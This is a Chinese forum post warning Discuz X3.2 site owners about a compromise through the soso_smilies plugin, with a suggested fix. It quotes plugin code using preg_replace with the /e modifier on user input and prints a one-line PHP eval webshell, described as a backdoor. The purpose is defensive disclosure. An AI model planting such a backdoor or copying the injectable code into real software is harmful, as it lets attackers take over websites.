开发者社区> 问答> 正文

解决某网站WEB攻击改写代码DZ3.2必看

用DZX3.2的小伙伴们注意了,DZ3.2安全很不完善。下面是本人网站被改写的一段代码。



第61行:     if($_GET['ac'] == 'pm' && $_GET['mod'] == 'spacecp') {
第62行:     if(empty($_GET['op'])) {
第64行:     } elseif($_GET['op'] == 'showmsg') {
第67行:     } elseif($_GET['subop'] == 'view' && $_GET['do'] == 'pm' && $_GET['mod'] == 'space') {
第113行:     if(!empty($_GET['message'])) {
第139行:     if($_GET['ac'] == 'profile' && submitcheck('profilesubmitbtn') && !empty($_POST['sightml'])) {
第140行:     $_POST['sightml'] = preg_replace("/\{\:soso_((e\d+)|(_\d+_\d))\:\}/e", '$this->_soso_smiles("\\1", -1, 0, 1)', $_POST['sightml'], $_G['setting']['maxsmilies']);
第152行:     } elseif($_GET['op'] == 'showchatmsg' && $GLOBALS['list']) {
第163行:     if(!empty($_GET['subop'])) {




黑客在php文件中插入<?php @eval($_POST['黑客的密码']);?>这样的语句,来当做控制网站的后门,利用改后门能完全控制网站任意文件这就被称为一句话木马,它是基于B/S结构的。


被篡改路径: ..//source/plugin/soso_smilies/soso.class.php




修复方法:直接删除soso.class.php文件。或者改写以上代码段

展开
收起
凋零的琴声 2014-12-06 19:19:11 7213 0
1 条回答
写回答
取消 提交回答
  • Re解决某网站WEB攻击改写代码DZ3.2必看
    哦 关注
    2014-12-06 20:11:51
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
Web应用系统性能优化 立即下载
高性能Web架构之缓存体系 立即下载
PWA:移动Web的现在与未来 立即下载